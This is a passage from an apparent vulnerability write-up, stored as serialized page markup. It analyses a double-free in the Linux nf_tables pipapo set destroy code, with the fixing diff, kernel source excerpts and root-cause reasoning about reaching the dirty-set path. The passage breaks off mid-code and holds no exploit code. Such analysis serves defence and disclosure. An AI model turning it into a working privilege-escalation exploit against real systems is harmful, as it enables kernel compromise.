rcu_barrier();\n",{"type":27,"tag":207,"props":58078,"children":58079},{"class":209,"line":2130},[58080],{"type":27,"tag":207,"props":58081,"children":58082},{"style":238},[58083],{"type":33,"value":58084}," \n",{"type":27,"tag":207,"props":58086,"children":58087},{"class":209,"line":2168},[58088],{"type":27,"tag":207,"props":58089,"children":58090},{"style":1325},[58091],{"type":33,"value":58092},"- nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":27,"tag":207,"props":58094,"children":58095},{"class":209,"line":4095},[58096],{"type":27,"tag":207,"props":58097,"children":58098},{"style":1325},[58099],{"type":33,"value":58100},"-\n",{"type":27,"tag":207,"props":58102,"children":58103},{"class":209,"line":4103},[58104],{"type":27,"tag":207,"props":58105,"children":58106},{"style":238},[58107],{"type":33,"value":58108}," for_each_possible_cpu(cpu)\n",{"type":27,"tag":207,"props":58110,"children":58111},{"class":209,"line":4154},[58112],{"type":27,"tag":207,"props":58113,"children":58114},{"style":238},[58115],{"type":33,"value":58116}," pipapo_free_scratch(m, cpu);\n",{"type":27,"tag":207,"props":58118,"children":58119},{"class":209,"line":4203},[58120],{"type":27,"tag":207,"props":58121,"children":58122},{"style":238},[58123],{"type":33,"value":58124}," free_percpu(m->scratch);\n",{"type":27,"tag":207,"props":58126,"children":58127},{"class":209,"line":4249},[58128],{"type":27,"tag":207,"props":58129,"children":58130},{"style":238},[58131],{"type":33,"value":58132},"@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":27,"tag":207,"props":58134,"children":58135},{"class":209,"line":4290},[58136],{"type":27,"tag":207,"props":58137,"children":58138},{"style":238},[58139],{"type":33,"value":58140}," if (priv->clone) {\n",{"type":27,"tag":207,"props":58142,"children":58143},{"class":209,"line":4304},[58144],{"type":27,"tag":207,"props":58145,"children":58146},{"style":238},[58147],{"type":33,"value":58148}," m = priv->clone;\n",{"type":27,"tag":207,"props":58150,"children":58151},{"class":209,"line":5466},[58152],{"type":27,"tag":207,"props":58153,"children":58154},{"style":238},[58155],{"type":33,"value":58084},{"type":27,"tag":207,"props":58157,"children":58158},{"class":209,"line":5530},[58159],{"type":27,"tag":207,"props":58160,"children":58161},{"style":1325},[58162],{"type":33,"value":58163},"- if (priv->dirty)\n",{"type":27,"tag":207,"props":58165,"children":58166},{"class":209,"line":7900},[58167],{"type":27,"tag":207,"props":58168,"children":58169},{"style":1325},[58170],{"type":33,"value":58171},"- nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":27,"tag":207,"props":58173,"children":58174},{"class":209,"line":7909},[58175],{"type":27,"tag":207,"props":58176,"children":58177},{"style":232},[58178],{"type":33,"value":58179},"+ nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":27,"tag":207,"props":58181,"children":58182},{"class":209,"line":7917},[58183],{"type":27,"tag":207,"props":58184,"children":58185},{"style":238},[58186],{"type":33,"value":58084},{"type":27,"tag":207,"props":58188,"children":58189},{"class":209,"line":7926},[58190],{"type":27,"tag":207,"props":58191,"children":58192},{"style":238},[58193],{"type":33,"value":58108},{"type":27,"tag":207,"props":58195,"children":58196},{"class":209,"line":7934},[58197],{"type":27,"tag":207,"props":58198,"children":58199},{"style":238},[58200],{"type":33,"value":58201}," pipapo_free_scratch(priv->clone, cpu);\n",{"type":27,"tag":36,"props":58203,"children":58204},{},[58205,58207,58213,58214,58220,58222,58228,58230,58236,58238,58243,58245,58251,58253,58259,58261,58267],{"type":33,"value":58206},"If the ",{"type":27,"tag":84,"props":58208,"children":58210},{"className":58209},[],[58211],{"type":33,"value":58212},"priv->dirty",{"type":33,"value":1131},{"type":27,"tag":84,"props":58215,"children":58217},{"className":58216},[],[58218],{"type":33,"value":58219},"priv->clone",{"type":33,"value":58221}," variables are set, ",{"type":27,"tag":84,"props":58223,"children":58225},{"className":58224},[],[58226],{"type":33,"value":58227},"nft_set_pipapo_match_destroy()",{"type":33,"value":58229}," is called twice, once with ",{"type":27,"tag":84,"props":58231,"children":58233},{"className":58232},[],[58234],{"type":33,"value":58235},"priv->match",{"type":33,"value":58237}," as an argument, and then again with ",{"type":27,"tag":84,"props":58239,"children":58241},{"className":58240},[],[58242],{"type":33,"value":58219},{"type":33,"value":58244},". Looking at what this function does, we can see that it is iterating over the ",{"type":27,"tag":84,"props":58246,"children":58248},{"className":58247},[],[58249],{"type":33,"value":58250},"setelem",{"type":33,"value":58252},"s of the ",{"type":27,"tag":84,"props":58254,"children":58256},{"className":58255},[],[58257],{"type":33,"value":58258},"set",{"type":33,"value":58260}," and calling ",{"type":27,"tag":84,"props":58262,"children":58264},{"className":58263},[],[58265],{"type":33,"value":58266},"nf_tables_set_elem_destroy()",{"type":33,"value":58268}," for each of them.",{"type":27,"tag":101,"props":58270,"children":58272},{"className":23789,"code":58271,"language":10435,"meta":7,"style":7},"static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,\n const struct nft_set *set,\n struct nft_pipapo_match *m)\n{\n struct nft_pipapo_field *f;\n int i, r;\n\n for (i = 0, f = m->f; i \u003C m->field_count - 1; i++, f++)\n ;\n\n for (r = 0; r \u003C f->rules; r++) {\n struct nft_pipapo_elem *e;\n\n if (r \u003C f->rules - 1 && f->mt[r + 1].e == f->mt[r].e)\n continue;\n\n e = f->mt[r].e;\n\n nf_tables_set_elem_destroy(ctx, set, &e->priv);\n }\n}\n",[58273],{"type":27,"tag":84,"props":58274,"children":58275},{"__ignoreMap":7},[58276,58323,58351,58377,58384,58405,58418,58425,58520,58528,58535,58590,58611,58618,58720,58732,58739,58775,58782,58816,58823],{"type":27,"tag":207,"props":58277,"children":58278},{"class":209,"line":210},[58279,58284,58289,58294,58298,58302,58306,58311,58315,58319],{"type":27,"tag":207,"props":58280,"children":58281},{"style":214},[58282],{"type":33,"value":58283},"static",{"type":27,"tag":207,"props":58285,"children":58286},{"style":214},[58287],{"type":33,"value":58288}," void",{"type":27,"tag":207,"props":58290,"children":58291},{"style":1335},[58292],{"type":33,"value":58293}," nft_set_pipapo_match_destroy",{"type":27,"tag":207,"props":58295,"children":58296},{"style":238},[58297],{"type":33,"value":1343},{"type":27,"tag":207,"props":58299,"children":58300},{"style":214},[58301],{"type":33,"value":16931},{"type":27,"tag":207,"props":58303,"children":58304},{"style":214},[58305],{"type":33,"value":28423},{"type":27,"tag":207,"props":58307,"children":58308},{"style":238},[58309],{"type":33,"value":58310}," nft_ctx ",{"type":27,"tag":207,"props":58312,"children":58313},{"style":226},[58314],{"type":33,"value":9286},{"type":27,"tag":207,"props":58316,"children":58317},{"style":220},[58318],{"type":33,"value":27552},{"type":27,"tag":207,"props":58320,"children":58321},{"style":238},[58322],{"type":33,"value":1842},{"type":27,"tag":207,"props":58324,"children":58325},{"class":209,"line":244},[58326,58330,58334,58339,58343,58347],{"type":27,"tag":207,"props":58327,"children":58328},{"style":214},[58329],{"type":33,"value":38807},{"type":27,"tag":207,"props":58331,"children":58332},{"style":214},[58333],{"type":33,"value":28423},{"type":27,"tag":207,"props":58335,"children":58336},{"style":238},[58337],{"type":33,"value":58338}," nft_set ",{"type":27,"tag":207,"props":58340,"children":58341},{"style":226},[58342],{"type":33,"value":9286},{"type":27,"tag":207,"props":58344,"children":58345},{"style":220},[58346],{"type":33,"value":58258},{"type":27,"tag":207,"props":58348,"children":58349},{"style":238},[58350],{"type":33,"value":1842},{"type":27,"tag":207,"props":58352,"children":58353},{"class":209,"line":270},[58354,58359,58364,58368,58373],{"type":27,"tag":207,"props":58355,"children":58356},{"style":214},[58357],{"type":33,"value":58358}," struct",{"type":27,"tag":207,"props":58360,"children":58361},{"style":238},[58362],{"type":33,"value":58363}," nft_pipapo_match ",{"type":27,"tag":207,"props":58365,"children":58366},{"style":226},[58367],{"type":33,"value":9286},{"type":27,"tag":207,"props":58369,"children":58370},{"style":220},[58371],{"type":33,"value":58372},"m",{"type":27,"tag":207,"props":58374,"children":58375},{"style":238},[58376],{"type":33,"value":10449},{"type":27,"tag":207,"props":58378,"children":58379},{"class":209,"line":296},[58380],{"type":27,"tag":207,"props":58381,"children":58382},{"style":238},[58383],{"type":33,"value":18158},{"type":27,"tag":207,"props":58385,"children":58386},{"class":209,"line":445},[58387,58391,58396,58400],{"type":27,"tag":207,"props":58388,"children":58389},{"style":214},[58390],{"type":33,"value":28423},{"type":27,"tag":207,"props":58392,"children":58393},{"style":238},[58394],{"type":33,"value":58395}," nft_pipapo_field ",{"type":27,"tag":207,"props":58397,"children":58398},{"style":226},[58399],{"type":33,"value":9286},{"type":27,"tag":207,"props":58401,"children":58402},{"style":238},[58403],{"type":33,"value":58404},"f;\n",{"type":27,"tag":207,"props":58406,"children":58407},{"class":209,"line":867},[58408,58413],{"type":27,"tag":207,"props":58409,"children":58410},{"style":214},[58411],{"type":33,"value":58412}," int",{"type":27,"tag":207,"props":58414,"children":58415},{"style":238},[58416],{"type":33,"value":58417}," i, r;\n",{"type":27,"tag":207,"props":58419,"children":58420},{"class":209,"line":892},[58421],{"type":27,"tag":207,"props":58422,"children":58423},{"emptyLinePlaceholder":19},[58424],{"type":33,"value":2062},{"type":27,"tag":207,"props":58426,"children":58427},{"class":209,"line":1475},[58428,58433,58438,58442,58446,58451,58455,58460,58464,58468,58473,58477,58481,58485,58490,58494,58498,58503,58507,58512,58516],{"type":27,"tag":207,"props":58429,"children":58430},{"style":376},[58431],{"type":33,"value":58432}," for",{"type":27,"tag":207,"props":58434,"children":58435},{"style":238},[58436],{"type":33,"value":58437}," (i ",{"type":27,"tag":207,"props":58439,"children":58440},{"style":226},[58441],{"type":33,"value":10380},{"type":27,"tag":207,"props":58443,"children":58444},{"style":232},[58445],{"type":33,"value":4680},{"type":27,"tag":207,"props":58447,"children":58448},{"style":238},[58449],{"type":33,"value":58450},", f ",{"type":27,"tag":207,"props":58452,"children":58453},{"style":226},[58454],{"type":33,"value":10380},{"type":27,"tag":207,"props":58456,"children":58457},{"style":220},[58458],{"type":33,"value":58459}," m",{"type":27,"tag":207,"props":58461,"children":58462},{"style":238},[58463],{"type":33,"value":8968},{"type":27,"tag":207,"props":58465,"children":58466},{"style":220},[58467],{"type":33,"value":7596},{"type":27,"tag":207,"props":58469,"children":58470},{"style":238},[58471],{"type":33,"value":58472},"; i ",{"type":27,"tag":207,"props":58474,"children":58475},{"style":226},[58476],{"type":33,"value":9257},{"type":27,"tag":207,"props":58478,"children":58479},{"style":220},[58480],{"type":33,"value":58459},{"type":27,"tag":207,"props":58482,"children":58483},{"style":238},[58484],{"type":33,"value":8968},{"type":27,"tag":207,"props":58486,"children":58487},{"style":220},[58488],{"type":33,"value":58489},"field_count",{"type":27,"tag":207,"props":58491,"children":58492},{"style":226},[58493],{"type":33,"value":544},{"type":27,"tag":207,"props":58495,"children":58496},{"style":232},[58497],{"type":33,"value":235},{"type":27,"tag":207,"props":58499,"children":58500},{"style":238},[58501],{"type":33,"value":58502},"; i",{"type":27,"tag":207,"props":58504,"children":58505},{"style":226},[58506],{"type":33,"value":4713},{"type":27,"tag":207,"props":58508,"children":58509},{"style":238},[58510],{"type":33,"value":58511},", f",{"type":27,"tag":207,"props":58513,"children":58514},{"style":226},[58515],{"type":33,"value":4713},{"type":27,"tag":207,"props":58517,"children":58518},{"style":238},[58519],{"type":33,"value":10449},{"type":27,"tag":207,"props":58521,"children":58522},{"class":209,"line":2065},[58523],{"type":27,"tag":207,"props":58524,"children":58525},{"style":238},[58526],{"type":33,"value":58527}," ;\n",{"type":27,"tag":207,"props":58529,"children":58530},{"class":209,"line":2092},[58531],{"type":27,"tag":207,"props":58532,"children":58533},{"emptyLinePlaceholder":19},[58534],{"type":33,"value":2062},{"type":27,"tag":207,"props":58536,"children":58537},{"class":209,"line":2130},[58538,58542,58547,58551,58555,58560,58564,58568,58572,58577,58582,58586],{"type":27,"tag":207,"props":58539,"children":58540},{"style":376},[58541],{"type":33,"value":58432},{"type":27,"tag":207,"props":58543,"children":58544},{"style":238},[58545],{"type":33,"value":58546}," (r ",{"type":27,"tag":207,"props":58548,"children":58549},{"style":226},[58550],{"type":33,"value":10380},{"type":27,"tag":207,"props":58552,"children":58553},{"style":232},[58554],{"type":33,"value":4680},{"type":27,"tag":207,"props":58556,"children":58557},{"style":238},[58558],{"type":33,"value":58559},"; r ",{"type":27,"tag":207,"props":58561,"children":58562},{"style":226},[58563],{"type":33,"value":9257},{"type":27,"tag":207,"props":58565,"children":58566},{"style":220},[58567],{"type":33,"value":4259},{"type":27,"tag":207,"props":58569,"children":58570},{"style":238},[58571],{"type":33,"value":8968},{"type":27,"tag":207,"props":58573,"children":58574},{"style":220},[58575],{"type":33,"value":58576},"rules",{"type":27,"tag":207,"props":58578,"children":58579},{"style":238},[58580],{"type":33,"value":58581},"; r",{"type":27,"tag":207,"props":58583,"children":58584},{"style":226},[58585],{"type":33,"value":4713},{"type":27,"tag":207,"props":58587,"children":58588},{"style":238},[58589],{"type":33,"value":1424},{"type":27,"tag":207,"props":58591,"children":58592},{"class":209,"line":2168},[58593,58597,58602,58606],{"type":27,"tag":207,"props":58594,"children":58595},{"style":214},[58596],{"type":33,"value":13080},{"type":27,"tag":207,"props":58598,"children":58599},{"style":238},[58600],{"type":33,"value":58601}," nft_pipapo_elem ",{"type":27,"tag":207,"props":58603,"children":58604},{"style":226},[58605],{"type":33,"value":9286},{"type":27,"tag":207,"props":58607,"children":58608},{"style":238},[58609],{"type":33,"value":58610},"e;\n",{"type":27,"tag":207,"props":58612,"children":58613},{"class":209,"line":4095},[58614],{"type":27,"tag":207,"props":58615,"children":58616},{"emptyLinePlaceholder":19},[58617],{"type":33,"value":2062},{"type":27,"tag":207,"props":58619,"children":58620},{"class":209,"line":4103},[58621,58625,58629,58633,58637,58641,58645,58649,58653,58657,58661,58665,58670,58675,58679,58683,58687,58691,58695,58699,58703,58707,58712,58716],{"type":27,"tag":207,"props":58622,"children":58623},{"style":376},[58624],{"type":33,"value":38654},{"type":27,"tag":207,"props":58626,"children":58627},{"style":238},[58628],{"type":33,"value":58546},{"type":27,"tag":207,"props":58630,"children":58631},{"style":226},[58632],{"type":33,"value":9257},{"type":27,"tag":207,"props":58634,"children":58635},{"style":220},[58636],{"type":33,"value":4259},{"type":27,"tag":207,"props":58638,"children":58639},{"style":238},[58640],{"type":33,"value":8968},{"type":27,"tag":207,"props":58642,"children":58643},{"style":220},[58644],{"type":33,"value":58576},{"type":27,"tag":207,"props":58646,"children":58647},{"style":226},[58648],{"type":33,"value":544},{"type":27,"tag":207,"props":58650,"children":58651},{"style":232},[58652],{"type":33,"value":235},{"type":27,"tag":207,"props":58654,"children":58655},{"style":226},[58656],{"type":33,"value":21461},{"type":27,"tag":207,"props":58658,"children":58659},{"style":220},[58660],{"type":33,"value":4259},{"type":27,"tag":207,"props":58662,"children":58663},{"style":238},[58664],{"type":33,"value":8968},{"type":27,"tag":207,"props":58666,"children":58667},{"style":220},[58668],{"type":33,"value":58669},"mt",{"type":27,"tag":207,"props":58671,"children":58672},{"style":238},[58673],{"type":33,"value":58674},"[r ",{"type":27,"tag":207,"props":58676,"children":58677},{"style":226},[58678],{"type":33,"value":2227},{"type":27,"tag":207,"props":58680,"children":58681},{"style":232},[58682],{"type":33,"value":235},{"type":27,"tag":207,"props":58684,"children":58685},{"style":238},[58686],{"type":33,"value":57587},{"type":27,"tag":207,"props":58688,"children":58689},{"style":220},[58690],{"type":33,"value":1419},{"type":27,"tag":207,"props":58692,"children":58693},{"style":226},[58694],{"type":33,"value":10572},{"type":27,"tag":207,"props":58696,"children":58697},{"style":220},[58698],{"type":33,"value":4259},{"type":27,"tag":207,"props":58700,"children":58701},{"style":238},[58702],{"type":33,"value":8968},{"type":27,"tag":207,"props":58704,"children":58705},{"style":220},[58706],{"type":33,"value":58669},{"type":27,"tag":207,"props":58708,"children":58709},{"style":238},[58710],{"type":33,"value":58711},"[r].",{"type":27,"tag":207,"props":58713,"children":58714},{"style":220},[58715],{"type":33,"value":1419},{"type":27,"tag":207,"props":58717,"children":58718},{"style":238},[58719],{"type":33,"value":10449},{"type":27,"tag":207,"props":58721,"children":58722},{"class":209,"line":4154},[58723,58728],{"type":27,"tag":207,"props":58724,"children":58725},{"style":376},[58726],{"type":33,"value":58727}," continue",{"type":27,"tag":207,"props":58729,"children":58730},{"style":238},[58731],{"type":33,"value":241},{"type":27,"tag":207,"props":58733,"children":58734},{"class":209,"line":4203},[58735],{"type":27,"tag":207,"props":58736,"children":58737},{"emptyLinePlaceholder":19},[58738],{"type":33,"value":2062},{"type":27,"tag":207,"props":58740,"children":58741},{"class":209,"line":4249},[58742,58747,58751,58755,58759,58763,58767,58771],{"type":27,"tag":207,"props":58743,"children":58744},{"style":238},[58745],{"type":33,"value":58746}," e ",{"type":27,"tag":207,"props":58748,"children":58749},{"style":226},[58750],{"type":33,"value":10380},{"type":27,"tag":207,"props":58752,"children":58753},{"style":220},[58754],{"type":33,"value":4259},{"type":27,"tag":207,"props":58756,"children":58757},{"style":238},[58758],{"type":33,"value":8968},{"type":27,"tag":207,"props":58760,"children":58761},{"style":220},[58762],{"type":33,"value":58669},{"type":27,"tag":207,"props":58764,"children":58765},{"style":238},[58766],{"type":33,"value":58711},{"type":27,"tag":207,"props":58768,"children":58769},{"style":220},[58770],{"type":33,"value":1419},{"type":27,"tag":207,"props":58772,"children":58773},{"style":238},[58774],{"type":33,"value":241},{"type":27,"tag":207,"props":58776,"children":58777},{"class":209,"line":4290},[58778],{"type":27,"tag":207,"props":58779,"children":58780},{"emptyLinePlaceholder":19},[58781],{"type":33,"value":2062},{"type":27,"tag":207,"props":58783,"children":58784},{"class":209,"line":4304},[58785,58790,58795,58799,58803,58807,58812],{"type":27,"tag":207,"props":58786,"children":58787},{"style":1335},[58788],{"type":33,"value":58789}," nf_tables_set_elem_destroy",{"type":27,"tag":207,"props":58791,"children":58792},{"style":238},[58793],{"type":33,"value":58794},"(ctx, set, ",{"type":27,"tag":207,"props":58796,"children":58797},{"style":226},[58798],{"type":33,"value":10398},{"type":27,"tag":207,"props":58800,"children":58801},{"style":220},[58802],{"type":33,"value":1419},{"type":27,"tag":207,"props":58804,"children":58805},{"style":238},[58806],{"type":33,"value":8968},{"type":27,"tag":207,"props":58808,"children":58809},{"style":220},[58810],{"type":33,"value":58811},"priv",{"type":27,"tag":207,"props":58813,"children":58814},{"style":238},[58815],{"type":33,"value":1455},{"type":27,"tag":207,"props":58817,"children":58818},{"class":209,"line":5466},[58819],{"type":27,"tag":207,"props":58820,"children":58821},{"style":238},[58822],{"type":33,"value":16872},{"type":27,"tag":207,"props":58824,"children":58825},{"class":209,"line":5530},[58826],{"type":27,"tag":207,"props":58827,"children":58828},{"style":238},[58829],{"type":33,"value":451},{"type":27,"tag":36,"props":58831,"children":58832},{},[58833,58835,58841,58843,58848],{"type":33,"value":58834},"Which will then ",{"type":27,"tag":84,"props":58836,"children":58838},{"className":58837},[],[58839],{"type":33,"value":58840},"kfree()",{"type":33,"value":58842}," the ",{"type":27,"tag":84,"props":58844,"children":58846},{"className":58845},[],[58847],{"type":33,"value":58250},{"type":33,"value":1041},{"type":27,"tag":101,"props":58850,"children":58852},{"className":23789,"code":58851,"language":10435,"meta":7,"style":7},"void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,\n const struct nft_set *set,\n const struct nft_elem_priv *elem_priv)\n{\n struct nft_set_ext *ext = nft_set_elem_ext(set, elem_priv);\n\n if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))\n nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));\n\n kfree(elem_priv);\n}\n",[58853],{"type":27,"tag":84,"props":58854,"children":58855},{"__ignoreMap":7},[58856,58897,58925,58954,58961,58996,59003,59024,59047,59054,59067],{"type":27,"tag":207,"props":58857,"children":58858},{"class":209,"line":210},[58859,58864,58869,58873,58877,58881,58885,58889,58893],{"type":27,"tag":207,"props":58860,"children":58861},{"style":214},[58862],{"type":33,"value":58863},"void",{"type":27,"tag":207,"props":58865,"children":58866},{"style":1335},[58867],{"type":33,"value":58868}," nf_tables_set_elem_destroy",{"type":27,"tag":207,"props":58870,"children":58871},{"style":238},[58872],{"type":33,"value":1343},{"type":27,"tag":207,"props":58874,"children":58875},{"style":214},[58876],{"type":33,"value":16931},{"type":27,"tag":207,"props":58878,"children":58879},{"style":214},[58880],{"type":33,"value":28423},{"type":27,"tag":207,"props":58882,"children":58883},{"style":238},[58884],{"type":33,"value":58310},{"type":27,"tag":207,"props":58886,"children":58887},{"style":226},[58888],{"type":33,"value":9286},{"type":27,"tag":207,"props":58890,"children":58891},{"style":220},[58892],{"type":33,"value":27552},{"type":27,"tag":207,"props":58894,"children":58895},{"style":238},[58896],{"type":33,"value":1842},{"type":27,"tag":207,"props":58898,"children":58899},{"class":209,"line":244},[58900,58905,58909,58913,58917,58921],{"type":27,"tag":207,"props":58901,"children":58902},{"style":214},[58903],{"type":33,"value":58904}," const",{"type":27,"tag":207,"props":58906,"children":58907},{"style":214},[58908],{"type":33,"value":28423},{"type":27,"tag":207,"props":58910,"children":58911},{"style":238},[58912],{"type":33,"value":58338},{"type":27,"tag":207,"props":58914,"children":58915},{"style":226},[58916],{"type":33,"value":9286},{"type":27,"tag":207,"props":58918,"children":58919},{"style":220},[58920],{"type":33,"value":58258},{"type":27,"tag":207,"props":58922,"children":58923},{"style":238},[58924],{"type":33,"value":1842},{"type":27,"tag":207,"props":58926,"children":58927},{"class":209,"line":270},[58928,58932,58936,58941,58945,58950],{"type":27,"tag":207,"props":58929,"children":58930},{"style":214},[58931],{"type":33,"value":58904},{"type":27,"tag":207,"props":58933,"children":58934},{"style":214},[58935],{"type":33,"value":28423},{"type":27,"tag":207,"props":58937,"children":58938},{"style":238},[58939],{"type":33,"value":58940}," nft_elem_priv ",{"type":27,"tag":207,"props":58942,"children":58943},{"style":226},[58944],{"type":33,"value":9286},{"type":27,"tag":207,"props":58946,"children":58947},{"style":220},[58948],{"type":33,"value":58949},"elem_priv",{"type":27,"tag":207,"props":58951,"children":58952},{"style":238},[58953],{"type":33,"value":10449},{"type":27,"tag":207,"props":58955,"children":58956},{"class":209,"line":296},[58957],{"type":27,"tag":207,"props":58958,"children":58959},{"style":238},[58960],{"type":33,"value":18158},{"type":27,"tag":207,"props":58962,"children":58963},{"class":209,"line":445},[58964,58968,58973,58977,58982,58986,58991],{"type":27,"tag":207,"props":58965,"children":58966},{"style":214},[58967],{"type":33,"value":28423},{"type":27,"tag":207,"props":58969,"children":58970},{"style":238},[58971],{"type":33,"value":58972}," nft_set_ext ",{"type":27,"tag":207,"props":58974,"children":58975},{"style":226},[58976],{"type":33,"value":9286},{"type":27,"tag":207,"props":58978,"children":58979},{"style":238},[58980],{"type":33,"value":58981},"ext ",{"type":27,"tag":207,"props":58983,"children":58984},{"style":226},[58985],{"type":33,"value":10380},{"type":27,"tag":207,"props":58987,"children":58988},{"style":1335},[58989],{"type":33,"value":58990}," nft_set_elem_ext",{"type":27,"tag":207,"props":58992,"children":58993},{"style":238},[58994],{"type":33,"value":58995},"(set, elem_priv);\n",{"type":27,"tag":207,"props":58997,"children":58998},{"class":209,"line":867},[58999],{"type":27,"tag":207,"props":59000,"children":59001},{"emptyLinePlaceholder":19},[59002],{"type":33,"value":2062},{"type":27,"tag":207,"props":59004,"children":59005},{"class":209,"line":892},[59006,59010,59014,59019],{"type":27,"tag":207,"props":59007,"children":59008},{"style":376},[59009],{"type":33,"value":23063},{"type":27,"tag":207,"props":59011,"children":59012},{"style":238},[59013],{"type":33,"value":686},{"type":27,"tag":207,"props":59015,"children":59016},{"style":1335},[59017],{"type":33,"value":59018},"nft_set_ext_exists",{"type":27,"tag":207,"props":59020,"children":59021},{"style":238},[59022],{"type":33,"value":59023},"(ext, NFT_SET_EXT_EXPRESSIONS))\n",{"type":27,"tag":207,"props":59025,"children":59026},{"class":209,"line":1475},[59027,59032,59037,59042],{"type":27,"tag":207,"props":59028,"children":59029},{"style":1335},[59030],{"type":33,"value":59031}," nft_set_elem_expr_destroy",{"type":27,"tag":207,"props":59033,"children":59034},{"style":238},[59035],{"type":33,"value":59036},"(ctx, ",{"type":27,"tag":207,"props":59038,"children":59039},{"style":1335},[59040],{"type":33,"value":59041},"nft_set_ext_expr",{"type":27,"tag":207,"props":59043,"children":59044},{"style":238},[59045],{"type":33,"value":59046},"(ext));\n",{"type":27,"tag":207,"props":59048,"children":59049},{"class":209,"line":2065},[59050],{"type":27,"tag":207,"props":59051,"children":59052},{"emptyLinePlaceholder":19},[59053],{"type":33,"value":2062},{"type":27,"tag":207,"props":59055,"children":59056},{"class":209,"line":2092},[59057,59062],{"type":27,"tag":207,"props":59058,"children":59059},{"style":1335},[59060],{"type":33,"value":59061}," kfree",{"type":27,"tag":207,"props":59063,"children":59064},{"style":238},[59065],{"type":33,"value":59066},"(elem_priv);\n",{"type":27,"tag":207,"props":59068,"children":59069},{"class":209,"line":2130},[59070],{"type":27,"tag":207,"props":59071,"children":59072},{"style":238},[59073],{"type":33,"value":451},{"type":27,"tag":36,"props":59075,"children":59076},{},[59077,59078,59084,59086,59091,59093,59098,59100,59105,59106,59111,59113,59118,59120,59125,59127,59132],{"type":33,"value":23888},{"type":27,"tag":84,"props":59079,"children":59081},{"className":59080},[],[59082],{"type":33,"value":59083},"nft_pipapo_match",{"type":33,"value":59085}," objects contain views of the ",{"type":27,"tag":84,"props":59087,"children":59089},{"className":59088},[],[59090],{"type":33,"value":58250},{"type":33,"value":59092},"'s of a ",{"type":27,"tag":84,"props":59094,"children":59096},{"className":59095},[],[59097],{"type":33,"value":58258},{"type":33,"value":59099},". The difference between the ",{"type":27,"tag":84,"props":59101,"children":59103},{"className":59102},[],[59104],{"type":33,"value":58235},{"type":33,"value":1131},{"type":27,"tag":84,"props":59107,"children":59109},{"className":59108},[],[59110],{"type":33,"value":58219},{"type":33,"value":59112}," match objects is that the clone has a view of not only already committed ",{"type":27,"tag":84,"props":59114,"children":59116},{"className":59115},[],[59117],{"type":33,"value":58250},{"type":33,"value":59119},"'s that the \"normal\" one has but also a view of the ",{"type":27,"tag":84,"props":59121,"children":59123},{"className":59122},[],[59124],{"type":33,"value":58250},{"type":33,"value":59126},"'s that was still not committed that only exists in the current control-plane. In other words, the control plane makes changes to the clone, and if the commit path is reached, the changes are committed to ",{"type":27,"tag":84,"props":59128,"children":59130},{"className":59129},[],[59131],{"type":33,"value":58235},{"type":33,"value":1041},{"type":27,"tag":58,"props":59134,"children":59136},{"id":59135},"root-cause-analysis",[59137],{"type":33,"value":59138},"Root-cause analysis",{"type":27,"tag":36,"props":59140,"children":59141},{},[59142,59144,59150,59152,59157],{"type":33,"value":59143},"So ",{"type":27,"tag":84,"props":59145,"children":59147},{"className":59146},[],[59148],{"type":33,"value":59149},"nf_tables_set_elem_destroy",{"type":33,"value":59151}," being called for both match objects seems like a pretty straightforward double-free of the ",{"type":27,"tag":84,"props":59153,"children":59155},{"className":59154},[],[59156],{"type":33,"value":58250},{"type":33,"value":59158},"s that had already been committed since those will have duplicated views. At first glance, this is some bizarre-looking code. How did this bug come to be? How was it not detected before? Let's try to get to the bottom of it.",{"type":27,"tag":36,"props":59160,"children":59161},{},[59162,59164,59169,59171,59176,59178,59183,59185,59190,59192,59197],{"type":33,"value":59163},"We should now try to understand how to reach that path with the ",{"type":27,"tag":84,"props":59165,"children":59167},{"className":59166},[],[59168],{"type":33,"value":58212},{"type":33,"value":59170}," flag set, which is a member of the private data of a pipapo ",{"type":27,"tag":84,"props":59172,"children":59174},{"className":59173},[],[59175],{"type":33,"value":58250},{"type":33,"value":59177}," that becomes true whenever a change is made to the ",{"type":27,"tag":84,"props":59179,"children":59181},{"className":59180},[],[59182],{"type":33,"value":58258},{"type":33,"value":59184}," during the control-plane pass of a transaction. This is to tell the commit path that this ",{"type":27,"tag":84,"props":59186,"children":59188},{"className":59187},[],[59189],{"type":33,"value":58258},{"type":33,"value":59191}," has changes that have to be committed. If we refer to the code, we see that we can make the ",{"type":27,"tag":84,"props":59193,"children":59195},{"className":59194},[],[59196],{"type":33,"value":58258},{"type":33,"value":59198}," dirty by inserting a new element.",{"type":27,"tag":101,"props":59200,"children":59202},{"className":23789,"code":59201,"language":10435,"meta":7,"style":7},"static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,\n const struct nft_set_elem *elem,\n struct nft_elem_priv **elem_priv)\n{\n[...]\n priv->dirty = true;\n[...]\n}\n",[59203],{"type":27,"tag":84,"props":59204,"children":59205},{"__ignoreMap":7},[59206,59276,59305,59330,59337,59344,59373,59380],{"type":27,"tag":207,"props":59207,"children":59208},{"class":209,"line":210},[59209,59213,59217,59222,59226,59230,59234,59239,59243,59248,59252,59256,59260,59264,59268,59272],{"type":27,"tag":207,"props":59210,"children":59211},{"style":214},[59212],{"type":33,"value":58283},{"type":27,"tag":207,"props":59214,"children":59215},{"style":214},[59216],{"type":33,"value":58412},{"type":27,"tag":207,"props":59218,"children":59219},{"style":1335},[59220],{"type":33,"value":59221}," nft_pipapo_insert",{"type":27,"tag":207,"props":59223,"children":59224},{"style":238},[59225],{"type":33,"value":1343},{"type":27,"tag":207,"props":59227,"children":59228},{"style":214},[59229],{"type":33,"value":16931},{"type":27,"tag":207,"props":59231,"children":59232},{"style":214},[59233],{"type":33,"value":28423},{"type":27,"tag":207,"props":59235,"children":59236},{"style":238},[59237],{"type":33,"value":59238}," net 